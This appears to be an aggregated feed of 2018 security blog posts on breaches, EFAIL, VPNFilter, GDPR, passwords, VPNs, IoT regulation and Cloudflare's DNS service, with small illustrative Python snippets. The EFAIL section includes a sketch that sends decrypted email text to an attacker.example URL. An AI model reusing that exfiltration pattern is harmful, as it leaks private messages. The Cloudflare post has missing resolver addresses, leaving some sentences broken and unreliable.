More than 33,000 responses later, and the answer is a toss-up. The discussions in response to our tweet didn’t provide a clear answer either. This is despite months of high-profile Facebook scandals and years of massive data breach headlines.

So what’s going on?

The Question

Posing a poll question is tricky. The question needs to be approachable enough to generate a lot of answers. It also needs to be a simple multiple choice, with only a few words per answer.

This will almost always result in a straightforward poll.

Not so this time. The answers are almost evenly divided across the three possible responses. Digging deeper, one of the challenges is how respondents chose to define the “safety” of their data.

As a security professional, I use one definition, but in my experience most people have their own idea when it comes to the “safety” of their data.

For some, it’s being in control of who can access that data. For others, safety is whether or not the data will be available when they want to access it. Others still think about whether or not they can get their data back out of the network once it has been shared.

The formal name for these concepts in information security is the CIA triad—I know, I know, I didn’t name it—confidentiality, integrity, and availability.

Whether you know it or not, for any definition of “safe,” you need all three of these attributes. Let’s look at each in turn.


Confidentiality

If everything you posted on Facebook was public, how often would you share?

Confidentiality is the most important attribute for the safety of your data on social networks. Not having control of who can access your data makes social networks significantly less valuable.

How you control the confidentiality of your data depends on the network.

On Facebook, you can change each post to be visible to only you, your friends, or the public. Other finer-grained options for each post exist as well, if you know how to find them. Similarly, “Groups” allow you to share with a different audience.

On LinkedIn, you get similar options to Facebook. Twitter is much simpler. Your tweets are either public or protected (you approve who can see them), or you send a 1:1 direct message.

WhatsApp allows for 1:1 messaging or groups. Instagram defaults to public sharing but also allows direct messages.

Each of these systems helps you control who can see your data. They allow you to control the confidentiality of your data.

The more control you have and know how to use, the safer you will feel about your data.
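The audience controls described above boil down to a simple access-control check; a toy sketch of the idea (the audience names mirror Facebook’s options, but the model itself is my own simplification):

```python
from enum import Enum

class Audience(Enum):
    ONLY_ME = 1
    FRIENDS = 2
    PUBLIC = 3

def can_view(post_audience: Audience, viewer_is_owner: bool,
             viewer_is_friend: bool) -> bool:
    """Decide whether a viewer may see a post, given its audience setting."""
    if viewer_is_owner:
        return True
    if post_audience is Audience.PUBLIC:
        return True
    if post_audience is Audience.FRIENDS:
        return viewer_is_friend
    return False  # ONLY_ME: nobody but the owner

# A friends-only post is hidden from strangers but visible to friends.
print(can_view(Audience.FRIENDS, False, True))   # True
print(can_view(Audience.FRIENDS, False, False))  # False
```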


Integrity

Integrity is less of an issue with the major social networks. It’s understandable that once you’ve posted something, you expect the same information to be shown when appropriate.

But integrity issues do pop up in unexpected ways.

This happens most commonly when you post a video or photo and the network attempts to help you by automatically applying a filter, adjusting the levels, or possibly making edits on your behalf.

When your data changes without your permission or awareness, it could lead to unintended consequences.


Availability

Availability comes into play in two primary ways. It’s rare for social networks to have downtime or errors. This means that your data is almost always available when you want to view or share it.

The larger question of whether you can get your data back in its original format is much trickier. It’s a rare case that the social networks will let you export your complete information. It usually runs counter to their business model.

However, some networks do offer the ability to export said data from your account. This helps increase its availability to you.

Where Should You Focus?

The poll lacks context, which is the most likely reason why we saw the answers split almost evenly among the three choices.

While the availability and integrity of your data are important, in the context of your social media usage, confidentiality should be top of mind.

Most social networks provide a set of privacy controls that allow you to control who on the network can see your data.

Due to the nature of social media, these controls can change regularly. You should make a habit of checking the available options every so often to ensure that your data is safe.

Care About How You Share

Social media can be a fantastic way to engage with various communities, stay in touch with family and friends, and expand your perspective. Unfortunately, there are downsides as well.

We’ve posted before about fake news, the privacy impact of networks selling data, and other issues related to social media usage.

Despite these challenges, there are still more upsides than downsides. The key to being a responsible social media user is to understand the control you have over your data.

Regardless of how you define “safe,” it’s important to be aware of the network you’re sharing on, how to use the control settings on that network, and have a clear understanding of what information you’re comfortable sharing.

What social media networks do you use most often? Do you feel you understand their privacy settings? Let us know down below or on social media (we’re @TrendMicro on most networks).

The post The Safety of Your Data On Social Media appeared first on the Trend Micro blog.

Hitherto unknown marketing firm exposed hundreds of millions of Americans’ data


The detailed personal information of 230 million consumers and 110 million business contacts – including phone numbers, addresses, dates of birth, estimated income, and the number, age, and gender of children – has been left exposed for anyone on the internet to grab.

Read more in my article on the Tripwire State of Security blog.

Smashing Security #084: No! My voice is not my password


Who’s been collecting the voice prints of millions of people saying “My voice is my password”? Why has it become tougher for law enforcement to scoop up cellphone data? And who’s been turning up your central heating?

All this and much much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by John Hawes from AMTSO.


Carpenter v. United States

The decision in Carpenter v. United States is an unusually positive one for privacy. The Supreme Court ruled that the government generally can’t access historical cell-site location records without a warrant. (SCOTUS Blog links to the court documents.) The court put limits on the “third party” doctrine, and it will be fascinating to see how those limits play out.


As I said previously, I am thankful to the fine folks at the Knight First Amendment Institute at Columbia University for the opportunity to help with their technologists amicus brief in this case, and I’m glad to see that the third party doctrine is under stress. That doctrine has weakened the clear aims of the fourth amendment in protecting our daily lives against warrantless searches as our lives have involved storing more of our “papers” outside our homes.

Image via the mobile pc guys, who have advice about how to check your location history on Google, which is one of many places where it may be captured. That advice might still be useful — it’s hard to tell if the UI has changed, since I had turned off those features.

UK privacy watchdog slaps Yahoo with another fine over 2014 hack

Yahoo still isn't done facing the consequences for its handling of a massive 2014 data breach. The UK's Information Commissioner's Office has slapped Yahoo UK Services Ltd with a £250,000 (about $334,300) fine under the country's Data Protection Act. The ICO determined that Yahoo didn't take "appropriate" steps to protect the data of 515,121 UK users against hacks, including meeting protection standards and monitoring the credentials of staff with access to the information.

Source: ICO

Security newsround: June 2018

We round up reporting and research from across the web about the latest security news and developments. This month: help at hand for GDPR laggards, try and efail, biometrics blues, and calls for a router reboot as VPNFilter strikes.

Good data protection resources (see what we did there?)

Despite a very well flagged two-year countdown towards GDPR, the eleventh-hour scramble suggests many organisations were still unprepared. And let’s not forget that May 25 wasn’t a deadline but the start of an ongoing compliance process. Fortunately, there are some excellent resources to help, and we’ve rounded them up here.

This blog from Ireland’s deputy data protection commissioner debunks the widely – and wrongly – held theory of a bedding-in period before enforcement. The post also clarifies how organisations can mitigate the potential consequences of non-compliance with GDPR. Meanwhile, the Irish Data Protection Bill passed a vote in the Dáil in time for the regulation. You can read the bill in full, if that’s your thing, by clicking here.

In the UK, the Information Commissioner’s Office has produced in-depth guidance on consent for processing information. Specifically, when to apply consent and when to look for alternatives. (Plug: our COO Valerie Lyons wrote a fine blog on the very same subject here.) Together with the National Cyber Security Centre, the ICO also developed guidance to describe a set of technical security outcomes that are considered to represent appropriate measures under the GDPR.

The European Data Protection Board (EDPB), formerly known as the Article 29 Working Party, was quickly into action after 25 May. It published guidelines (PDF) on certification mechanisms under the regulation. This establishes the rules by which certification can take place, as proof of compliance with GDPR.

Finally, for an interesting US perspective on the regulation, here’s AlienVault CISO John McLeod. “Every company should prepare for ‘Right to be Forgotten’ requests, which could present operational and compliance issues,” he said.

Do the hack-a

World Rugby suffered a data breach which saw attackers obtain personal details for thousands of subscribers. The data included the first name, email address and encrypted passwords of thousands of users, including players, coaches and parents worldwide. The Sunday Telegraph broke the story, with an interesting take on the news. The breach may have been a random incident but it’s also possible it was a targeted attack. Potential culprits might be one of the groups that previously leaked information from sporting bodies like WADA and the IAAF. Rugby’s governing body discovered the incident in early May, and took down the affected website to conduct more examinations. World Rugby is based in Dublin, and as a result it informed the Data Protection Commissioner about the breach. How would you handle a breach on that scale? Read our 10 steps to better post-breach incident response.

Efail: an email encryption problem or a vulnerability disclosure problem?

A group of researchers in Germany recently published details of critical flaws in PGP/GPG and S/MIME email encryption. They warned that the vulnerabilities could decrypt previously encrypted emails, including sensitive messages sent in the past. Conforming to the security industry’s love of a catchy name (see also: Heartbleed, Shellshock), the researchers dubbed the flaw Efail.

It was the cue for urgent warnings, from several quarters, to stop using email encryption tools. As the researchers put it: “EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs.” The full technical research paper is here, while there’s a website with a Q&A here.
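The researchers’ direct-exfiltration technique can be illustrated conceptually: the attacker wraps the encrypted part of an intercepted email in an unclosed HTML image tag, so a vulnerable client that decrypts the message in place renders the recovered plaintext as part of an image URL and fetches it. A deliberately simplified sketch (the message assembly and the decryption step are stand-ins, not working exploit code):

```python
# Conceptual illustration of EFAIL-style direct exfiltration.
# The attacker cannot read the ciphertext, but controls the HTML around it.
attacker_html_prefix = '<img src="https://attacker.example/collect?t='
attacker_html_suffix = '">'

ciphertext = "<ENCRYPTED PGP PART>"          # opaque to the attacker
crafted_email_body = attacker_html_prefix + ciphertext + attacker_html_suffix

# A vulnerable client decrypts the PGP part in place...
plaintext = "meet at the safe house at 9pm"  # stand-in for the real secret
rendered = crafted_email_body.replace(ciphertext, plaintext)

# ...then renders the HTML, requesting the image URL -- which now
# carries the decrypted secret to the attacker's server.
start = rendered.index("https://")
url = rendered[start:rendered.index('"', start)]
print(url)  # https://attacker.example/collect?t=meet at the safe house at 9pm
```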

As the story moved on, it emerged that the problem lay more with how some email clients rendered messages. Motherboard’s snarky but well-informed take quoted Johns Hopkins University cryptography professor Matthew Green. He described the exploit as “an extremely cool attack and kind of a masterpiece in exploiting bad crypto, combined with a whole lot of sloppiness on the part of mail client developers.” ProtonMail, the world’s largest secure email service, was scathing about the news. After performing a deep analysis, it said its own client was not vulnerable, nor was the PGP protocol broken.

So what are the big lessons from this story? Distraction is a risk in security. Some security professionals may have rushed to react to Efail even if they didn’t need to. Curtis Franklin’s summary for Dark Reading observed that many enterprise IT teams have either moved away from PGP and S/MIME, or never used them. Noting the criticism of how the researchers published the vulnerabilities, Brian Honan wrote that ENISA, the European Union Agency for Network and Information Security, published excellent good practice for vulnerability disclosure.

Biometrics blues as police recognition tech loses face

There was bad news for fans of dystopian sci-fi as police facial recognition systems for nabbing bad guys proved unreliable. Big Brother Watch claimed the Metropolitan Police’s automated facial recognition technology misidentified innocent people as wanted criminals more than nine times out of 10. The civil liberties group presented a report to the UK parliament about the technology’s shortcomings. Among its findings was the high false positive rate. Police forces have supported facial biometrics as a tool to help them combat crime. Privacy advocates described the technology’s use as “dangerously authoritarian”. As noted on our blog, this isn’t the first time a UK organisation has tried to introduce biometrics.

Router reboot alert

Malware called VPNFilter has infected 500,000 routers worldwide, and the net seems to be widening. Cisco Talos Intelligence researchers first revealed the malware, which hijacked devices in more than 54 countries but primarily in Ukraine. “The VPNFilter malware is a multi-stage, modular platform with versatile capabilities to support both intelligence-collection and destructive cyber attack operations,” the researchers said. VPNFilter can snoop on traffic, steal website credentials, monitor Modbus SCADA protocols, and has the capacity to damage or brick infected devices.

Sophos has a useful plain English summary of VPNFilter and what it can do. The malware affected products from a wide range of manufacturers, including Linksys, Netgear, Mikrotik, Q-Nap and TP-Link. In a later update, Talos said some products from Asus, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE were also at risk. As the malware’s payload became apparent, the FBI advised router owners to reboot their devices. This story shows that it’s always worth checking your organisation’s current risk with a security assessment.


The post Security newsround: June 2018 appeared first on BH Consulting.

MyHeritage admits 92 million user email addresses were leaked

MyHeritage is the latest company to suffer a security breach after a researcher found a file containing email addresses and hashed passwords for more than 92 million users. The researcher alerted MyHeritage to the breach Monday. The data includes account details for users who signed up to the genealogy and DNA testing service by October 26th last year.

Via: Motherboard

Source: MyHeritage

Ticketfly hacker stole more than 26 million email and home addresses

A hacker has leaked personal information for more than 26 million Ticketfly users after last week's data breach. That's according to Troy Hunt, the founder of Have I Been Pwned, which lets you check whether your email address has been included in various data breaches.

Source: Motherboard
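Have I Been Pwned also runs a companion Pwned Passwords service with a k-anonymity API: you send only the first five characters of your password’s SHA-1 hash and compare the returned hash suffixes locally, so the full hash never leaves your machine. A sketch of the scheme (the query function needs network access):

```python
import hashlib
import urllib.request

def hash_parts(password: str):
    """Split the SHA-1 hash into the 5-char prefix sent to the API
    and the suffix matched locally."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]

def times_pwned(password: str) -> int:
    """Query the Pwned Passwords range API; the server only ever sees
    the five-character hash prefix."""
    prefix, suffix = hash_parts(password)
    url = f"https://api.pwnedpasswords.com/range/{prefix}"
    with urllib.request.urlopen(url) as resp:
        for line in resp.read().decode().splitlines():
            candidate, _, count = line.partition(":")
            if candidate == suffix:
                return int(count)
    return 0

prefix, suffix = hash_parts("password")
print(prefix)  # 5BAA6 -- only this leaves your machine
```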

Application Development GDPR Compliance Guidance

Last week IBM developerWorks released a three-part guidance series I have written to help application developers build GDPR-compliant applications.

Developing GDPR Compliant Applications Guidance

The General Data Protection Regulation (GDPR) was created by the European Commission and Council to strengthen and unify Europe's data protection law, replacing the 1995 European Data Protection Directive. Although the GDPR is a European Union (EU) regulation, it applies to any organization outside of Europe that handles the personal data of EU citizens. This includes the development of applications that are intended to process the personal information of EU citizens. Therefore, organizations that provide web applications, mobile apps, or traditional desktop applications that can directly or indirectly process EU citizens' personal data, or that allow EU citizens to sign in, are subject to the GDPR's privacy obligations. Organizations face the prospect of powerful sanctions should applications fail to comply with the GDPR.

Part 1: A Developer's Guide to the GDPR
Part 1 summarizes the GDPR and explains how the privacy regulation impacts and applies to developing and supporting applications that are intended to be used by European Union citizens.

Part 2: Application Privacy by Design
Part 2 provides guidance for developing applications that are compliant with the European Union’s General Data Protection Regulation. 

Part 3: Minimizing Application Privacy Risk

Part 3 provides practical application development techniques that can alleviate an application's privacy risk.
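The series itself goes into detail, but as a rough illustration of the kind of data-minimization technique Part 3 discusses, here is a small Python sketch of pseudonymization: replacing a stored identifier with a keyed hash so records can still be linked for analytics without keeping the raw personal data. (The function and key names are mine, not taken from the series.)

```python
import hashlib
import hmac

def pseudonymize(value: str, secret_key: bytes) -> str:
    """Replace an identifier with a keyed hash (HMAC-SHA256).

    The raw value cannot be recovered from the token, but the same
    input always yields the same token, so records can still be
    joined for analytics without storing the personal data itself.
    """
    return hmac.new(secret_key, value.encode("utf-8"), hashlib.sha256).hexdigest()

# Store the token instead of the raw email address.
key = b"server-side-secret"  # in practice, load this from a secrets manager
token = pseudonymize("alice@example.com", key)
```

A useful side effect of the keyed approach: destroying the key renders every stored token permanently anonymous, which is one practical way to honour an erasure request.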

Trivia Time: Test Your Family’s Password Safety Knowledge

Passwords have become critical tools for every citizen of the digital world. They stand between your family’s gold mine of personal data and the entirety of the internet. While most of us have a love-hate relationship with passwords, it’s worth remembering that they serve a powerful purpose when created and treated with intention.

But asking your kids to up their password game is like asking them to recite the state capitals — booooring! So, during this first week of May as we celebrate World Password Day, add a dash of fun to the mix. Encourage your family to test their knowledge with some Cybersavvy Trivia.

Want to find out what kind of password would take two centuries to crack? Or, discover the #1 trick thieves use to crack your password? Then take the quiz and see which family member genuinely knows how to create an awesome password.

We’ve come a long way in our understanding of what makes a strong password and the many ways nefarious strangers crack our most brilliant ones. We know that unique passwords are the hardest to crack, but we also know that human nature means we lean toward creating passwords that are also easy to remember. So striking a balance between strong and memorable may be the most prudent challenge to issue to your family this year.

Several foundational principles remain when it comes to creating strong passwords. Share them with your family and friends and take some of the worries out of password strength once and for all.

5 Password Power Principles

  1. Unique = power. A strong password includes numbers, lowercase and uppercase letters, and symbols. The more complicated your password is, the more difficult it will be to crack. Another option is a passphrase only you could know. For instance, look across the room: what do you see? I can see my dog. Only I know her personality, her likes and dislikes. So a possible password for me might be #BaconDoodle$. You can even throw in a deliberate misspelling to increase your password's strength, such as Passwurd4Life. Just be sure to remember your intentional typos if you choose this option.
  2. Diverse = power. Mixing up your passwords for different websites, apps, and accounts can be a hassle to remember but it’s necessary for online security. Try to use different passwords for online accounts so that if one account is compromised, several accounts aren’t put in jeopardy.
  3. Password manager = power. Working in conjunction with our #2 tip, forget about remembering every password for every account. Let a password manager do the hard work for you. A password manager is a tech tool for generating and storing passwords, so you don’t have to. It will also auto-log you onto frequently visited sites.
  4. Private = power. The strongest password is the one that’s kept private. Kids especially like to share passwords as a sign of loyalty between friends. They also share passwords to allow friends to take over their Snapchat streaks if they can’t log on each day. This is an unwise practice that can easily backfire.
  5. 2-step verification = power. Use multi-factor (two-step) authentication whenever possible. Multiple login steps can make a huge difference in securing important online accounts. Sometimes the steps can be a password plus a text confirmation or a PIN plus a fingerprint. These steps help keep the bad guys out even if they happen to gain access to your password.
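To put tips #1 and #3 into practice, here is a small illustrative Python snippet (a sketch of what a password manager's generator does, not a McAfee tool) that creates a random password containing all four character classes, using the cryptographically secure `secrets` module:

```python
import secrets
import string

SYMBOLS = "#$%&!@"

def make_password(length: int = 16) -> str:
    """Generate a random password with upper, lower, digits and symbols."""
    alphabet = string.ascii_letters + string.digits + SYMBOLS
    while True:
        pw = "".join(secrets.choice(alphabet) for _ in range(length))
        # Retry until every character class from tip #1 is present.
        if (any(c.islower() for c in pw) and any(c.isupper() for c in pw)
                and any(c.isdigit() for c in pw) and any(c in SYMBOLS for c in pw)):
            return pw

print(make_password())  # a fresh 16-character password each run
```

Because `secrets` draws from the operating system's secure random source, the result is not guessable the way a human-chosen password is.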

This digital life is a lot to manage, but once you’ve got the safety basics down, you can enjoy all the benefits of online life without worrying about your information getting into the wrong hands. So have fun, and stay informed knowing you’ve equipped your family to live their safest online life!

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures).

The post Trivia Time: Test Your Family’s Password Safety Knowledge appeared first on McAfee Blogs.

Cyber Security Roundup for April 2018

The fallout from the Facebook privacy scandal rumbled on throughout April and culminated with the closure of the company at the centre of the scandal, Cambridge Analytica.
Ikea was forced to shut down its freelance labour marketplace app and website 'TaskRabbit' following a 'security incident'. Ikea advised users of TaskRabbit to change their credentials if they had used them on other sites, suggesting a significant database compromise.

TSB bosses came under fire after a botched upgrade to their online banking system, which meant the Spanish-owned bank had to shut down its online banking facility, preventing usage by over 5 million TSB customers. Cybercriminals were quick to take advantage of TSB's woes.

Great Western Railway reset the passwords of more than a million customer accounts following a breach by hackers, US bank SunTrust reported an ex-employee stole 1.5 million bank client records, an NHS website was defaced by hackers, and US retailers Saks and Lord & Taylor had 5 million payment cards stolen after a staff member was successfully phished by a hacker.

The UK National Cyber Security Centre (NCSC) blacklisted China's state-owned firm ZTE, warning UK telecom providers that usage of ZTE's equipment could pose a national security risk. Interestingly, BT formed a research and development partnership with ZTE in 2011 and had distributed ZTE modems. The NCSC, along with the United States government, released statements accusing Russia of large-scale cyber campaigns aimed at compromising vast numbers of Western-based network devices.

IBM released the 2018 X-Force Report, a comprehensive report which stated, for the second year in a row, that the financial services sector was the most targeted by cybercriminals, typically with sophisticated malware such as Zeus, TrickBot, and Gootkit. NTT Security released their 2018 Global Threat Intelligence Report, which unsurprisingly confirmed that ransomware attacks had increased 350% last year.

A concerning report by the EEF said UK manufacturers' IT systems are often outdated and highly vulnerable to cyber threats, with nearly half of all UK manufacturers having already been victims of cybercrime. An Electropages blog questioned whether the boom in public cloud service adoption opens the door to cybercriminals.

Finally, it was yet another frantic month of security updates, with critical patches released by Microsoft, Adobe, Apple, Intel, Juniper, Cisco, and Drupal.


Does Your Family Need a VPN? Here are 3 Reasons it May Be Time

At one time, Virtual Private Networks (VPNs) were tools exclusive to corporations and techie friends who seemed overly zealous about masking their online activity. However, with data breaches and privacy concerns at an all-time high, VPNs are becoming powerful security tools for anyone who uses digital devices.

What’s a VPN?

A VPN allows users to securely access a private network and share data remotely through public networks. Much like a firewall protects the data on your computer, a VPN protects your activity by encrypting (or scrambling) your data when you connect to the internet from a remote or public location. A VPN allows you to hide your location, IP address, and online activity.

For instance, if you need to send a last-minute tax addendum to your accountant or a legal contract to your office but must use the airport’s public Wi-Fi, a VPN would protect — or create a secure tunnel in which that data can travel — while you are connected to the open network. Or, if your child wants to watch a YouTube or streaming video while on vacation and only has access to the hotel’s Wi-Fi, a VPN would encrypt your child’s data and allow a more secure internet connection. Without a VPN, any online activity — including gaming, social networking, and email — is fair game for hackers since public Wi-Fi lacks encryption.

Why VPNs matter

  • Your family is constantly on the go. If you find yourself conducting a lot of business on your laptop or mobile device, a VPN could be an option for you. Likewise, if you have a high school or college-aged child who likes to take his or her laptop to the library or coffee shop to work, a VPN would protect data sent or received from that location. Enjoy shopping online whenever you feel the urge? A VPN also has the ability to mask your physical location, banking account credentials, and credit card information. If your family shares a data plan like most, connecting to public Wi-Fi has become a data/money-saving habit. However, it’s a habit that puts you at risk of nefarious people eavesdropping, stealing personal information, and even infecting your device. Putting a VPN in place, via a subscription service, could help curb this risk. In addition, a VPN can encrypt conversations via texting apps and help keep private chats and content private.
  • You enjoy connected vacations/travel. It’s a great idea to unplug on vacation but let’s be honest, it’s also fun to watch movies, check in with friends via social media or email, and send Grandma a few pictures. Service to some of your favorite online streaming sites can be interrupted when traveling abroad. A VPN allows you to connect to a proxy server that will access online sites on your behalf and allow a secure and easier connection most anywhere you go.
  • Your family’s data is a big deal. Protecting personal information is a hot topic these days and for good reason. Most everything we do online is being tracked by Internet Service Providers (ISPs). ISPs track us by our individual Internet Protocol (IP) addresses generated by each device that connects to a network. Much like an identification number, each digital device has an IP address which allows it to communicate within the network. A VPN routes your online activity through different IP addresses, allowing you to remain anonymous. A favorite entry point hackers use to eavesdrop on your online activity is public Wi-Fi and unsecured networks. In addition to potentially stealing your private information, hackers can also use public Wi-Fi to distribute malware. Using a VPN cuts cyber crooks off from their favorite watering hole — public Wi-Fi!

As you can see, VPNs can give you an extra layer of protection as you surf, share, access, and receive content online. If you look for a VPN product to install on your devices, make sure it’s trustworthy and easy to use, such as McAfee’s Safe Connect. A robust VPN product will provide bank-grade encryption to ensure your digital data is safe from prying eyes.

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures).

The post Does Your Family Need a VPN? Here are 3 Reasons it May Be Time appeared first on McAfee Blogs.

5 Common Sense Security and Privacy IoT Regulations

F-Secure invites our fellows to share their expertise and insights. For more posts by Fennel, click here

For most of human history, the balance of power in commercial transactions has been heavily weighted in favour of the seller. As the Romans would say, caveat emptor – buyer beware!

However, there is just as long a history of people using their collective power to protect consumers from unscrupulous sellers, whose profits are too often based on externalising their costs which are then borne by the society. Probably the earliest known consumer safety law is found in Hammurabi’s Code nearly 4000 years ago – it is quite a harsh example:

If a builder builds a house for someone, and does not construct it properly, and the house which he built falls in and kills its owner, then that builder shall be put to death.

However, consumer safety laws as we know them today are a relatively new invention. The Consumer Product Safety Act became law in the USA in 1972. The Consumer Protection Act became law in the UK in 1987.

Today’s laws provide for stiff penalties – for example the UK’s CPA makes product safety issues into criminal offenses liable with up to 6 months in prison and unlimited fines. These laws also mandate enforcement agencies to set standards, buy and test products, and to sue sellers and manufacturers.

So if you sell a household device that causes physical harm to someone, you run some serious risks to your business and to your personal freedom. The same is not true if you sell a household device that causes very real financial, psychological, and physical harm to someone by putting their digital security at risk. The same is not true if you sell a household device that causes very real psychological harm, civil rights harm, and sometimes physical harm to someone by putting their privacy rights at risk. In those cases, your worst case risk is currently a slap on the wrist.

This situation may well change at the end of May 2018, when the EU General Data Protection Regulation (GDPR) goes into force across the EU, and for all companies with any presence or doing business in the EU. The GDPR provides two very welcome threats that can be wielded against would-be negligent vendors: the possibility of real fines – up to 4% of worldwide turnover; and a presumption of guilt if there is a breach – it will be up to the vendor to show that they were not negligent.

However, the GDPR does not specifically regulate digital consumer goods – in other words Internet of Things (IoT) “smart” devices. Your average IoT device is a disaster in terms of both security and privacy – as our Mikko Hypponen‘s eponymous Law states: “smart device” = “vulnerable device”, or if you prefer the Fennel Corollary: “smart device” = “vulnerable surveillance device”.

The current IoT market is like the household goods market before consumer safety laws were introduced. This is why I am very happy to see initiatives like the UK government’s proposed Secure by Design: Improving the cyber security of consumer Internet of Things Report. While the report has many issues, there is clearly a need for the addition of serious consumer protection laws in the security and privacy area.

So if the UK proposal does not go far enough, what would I propose as common sense IoT security and privacy regulation? Here are 5 things I think are mandatory for any serious regulation in this area:

  1. Consumer safety laws largely work due to the severe penalties in place for any company (and their directors) who provide consumers with goods that place their safety in danger, as well as the funding and willingness of a governmental consumer protection agency to sue companies on consumers’ behalf. The same rigorous, severe, and funded structure is required for IoT goods that place consumers’ digital and physical security in danger.
  2. The danger to consumers from IoT goods is not only in terms of security, but also in terms of privacy. I believe similar requirements must be put in place for Privacy by Design, including severe penalties for any collecting, storing, and selling (whether directly, or indirectly via profiling for targeting of advertising) of consumers’ personal data if it is not directly required for the correct functioning of the device and service as seen by the consumer.
  3. Similarly, the requirements should include a strict prohibition on any backdoor, including government or law enforcement related, to access user data, usage information, or any form of control over the devices. Additionally, the requirements should include a strict prohibition on vendors providing any such information or control via “gentleman’s agreements” with a governmental or law enforcement agency/representative.
  4. In terms of the requirements for security and privacy, I believe that any requirements specifically written into law will always be outdated and incomplete. Therefore I would mandate independent standards agencies in a similar way to other internet governing standards bodies. A good example is the management of TLS certificate security rules by the CA/Browser Forum.
  5. Requirements must also deal with cases of IoT vendors going out of business or discontinuing devices and/or software updates. There must be a minimum software update duration, and in the case of discontinuation of support, vendors should be required to provide the latest firmware and update tool as Open Source to allow support to be continued by the user or a third party.

Just as there will always be ways for a determined person to hack around any physical or software security controls, people will find ways around any regulations. However, it is still better to attempt to protect vulnerable consumers than to pretend the problem doesn’t exist; or even worse, to blame the users who have no real choice and no possibility to have any kind of informed consent for the very real security and privacy risks they face.

Let’s start somewhere!

Cloudflare Quad 1 DNS is privacy-centric and blazing fast


This year I have witnessed too many DNS stories, ranging from government censorship programs to privacy-centric secure DNS (DNS over TLS) intended to protect customers' queries from profiling or profiteering businesses. Some DNS services attempt to block malicious sites (IBM Quad9 DNS and SafeDNS), while others try to give unrestricted access to the world (Google DNS and Cisco OpenDNS) at low or no cost.

Yesterday, I read that Cloudflare has joined the race with its DNS service (Quad1, or, and before I dig further (#punintended) let me tell you - it's blazing fast! Initially I thought it was a classic April Fool's prank, but then Quad1 -, or 4/1 - made sense. This is not a prank, and it works just as proposed. Now, this blog post shall summarize some speed tests and highlight why it's best to use the Cloudflare Quad1 DNS.

Quad1 DNS Speed Test

To test the query time speeds (in milliseconds, or ms), I shall resolve three sites (my own site, my girlfriend's website, and my friend's blog) against four existing DNS services - Google DNS (, OpenDNS (, SafeDNS, and IBM Quad9 DNS ( - plus the new Cloudflare Quad1 (

Website   Google DNS   OpenDNS   IBM Quad9   SafeDNS   Cloudflare
Site 1           158       187          43       238            6
Site 2           365       476         233       338            3
Site 3           207       231         178       336            3

(All query times in ms; lower is faster.)


This looks so unrealistic, that I had to execute these tests again to verify, and these numbers are indeed true.
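For anyone who wants to reproduce the test, here is a rough Python equivalent of a `dig` timing run: it hand-builds a minimal DNS query (per the RFC 1035 wire format) and measures the UDP round trip to a resolver of your choice. This is my own sketch, not the tool used above, and timings will vary with your network.

```python
import socket
import struct
import time

def build_query(domain: str, qid: int = 0x1234) -> bytes:
    """Build a minimal DNS query packet (A record, recursion desired)."""
    header = struct.pack(">HHHHHH", qid, 0x0100, 1, 0, 0, 0)
    # QNAME: each label is length-prefixed, terminated by a zero byte.
    qname = b"".join(bytes([len(p)]) + p.encode() for p in domain.split("."))
    return header + qname + b"\x00" + struct.pack(">HH", 1, 1)  # QTYPE=A, QCLASS=IN

def time_query(server: str, domain: str) -> float:
    """Return the round-trip time in milliseconds for one UDP query."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(2.0)
        start = time.perf_counter()
        s.sendto(build_query(domain), (server, 53))
        s.recv(512)
        return (time.perf_counter() - start) * 1000

# e.g. time_query("", "example.com")
```

Run it against each resolver IP a few times and average, since a single UDP round trip can be noisy.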

Privacy and Security with Quad1 DNS

This is the key element that has not been addressed for quite a while. The existing DNS services are not only slow but also store logs, and can profile a user based on the domains they query. The existing DNS services run on UDP port 53 and are vulnerable to MITM (man-in-the-middle) attacks. Also, your ISP has visibility into this clear-text traffic and can censor or monetize you, if required. In a blog post last weekend, Matthew Prince, co-founder and CEO of Cloudflare, mentioned,

The web should have been encrypted from the beginning. It's a bug it wasn't. We're doing what we can to fix it ... DNS itself is a 35-year-old protocol and it's showing its age. It was never designed with privacy or security in mind.

The Cloudflare Quad1 DNS overcomes this by supporting both DNS over TLS and DNS over HTTPS, which means you can set up your internal DNS server and then route the queries to Cloudflare DNS over TLS or HTTPS. To address the story behind the choice of address, Matthew Prince explained,

But DNS resolvers inherently can't use a catchy domain because they are what have to be queried in order to figure out the IP address of a domain. It's a chicken and egg problem. And, if we wanted the service to be of help in times of crisis like the attempted Turkish coup, we needed something easy enough to remember and spraypaint on walls.

Kudos to Cloudflare for launching this service and committing to the privacy and security of end-users by keeping only short-lived logs. Cloudflare confirmed that it doesn't see a need to write customers' IP addresses to disk, and won't retain logs for more than 24 hours.
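As a quick illustration of the DNS-over-HTTPS support, Cloudflare also exposes a JSON endpoint at cloudflare-dns.com/dns-query that can be queried with nothing but the Python standard library. The endpoint and `Accept` header below are Cloudflare's documented JSON API; the function names are my own sketch:

```python
import json
import urllib.request

def doh_request(domain: str, rtype: str = "A") -> urllib.request.Request:
    """Build a request for Cloudflare's DNS-over-HTTPS JSON endpoint."""
    url = "https://cloudflare-dns.com/dns-query?name={}&type={}".format(domain, rtype)
    return urllib.request.Request(url, headers={"Accept": "application/dns-json"})

def resolve(domain: str, rtype: str = "A"):
    """Resolve a name over HTTPS; the query never travels in clear text."""
    with urllib.request.urlopen(doh_request(domain, rtype)) as resp:
        answers = json.load(resp).get("Answer", [])
    return [a["data"] for a in answers]

# e.g. resolve("cloudflare.com") returns that domain's A records
```

Because the query rides inside an ordinary HTTPS connection, neither your ISP nor anyone else on the path can see which domain you looked up.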

Cheers and be safe.

Don’t Get Duped: How to Spot 2018’s Top Tax Scams

It’s the most vulnerable time of the year. Tax time is when cyber criminals pull out their best scams and manage to swindle consumers — smart consumers — out of millions of dollars.

According to the Internal Revenue Service (IRS), crooks are getting creative and putting new twists on old scams using email, phishing and malware, threatening phone calls, and various forms of identity theft to gain access to your hard earned tax refund.

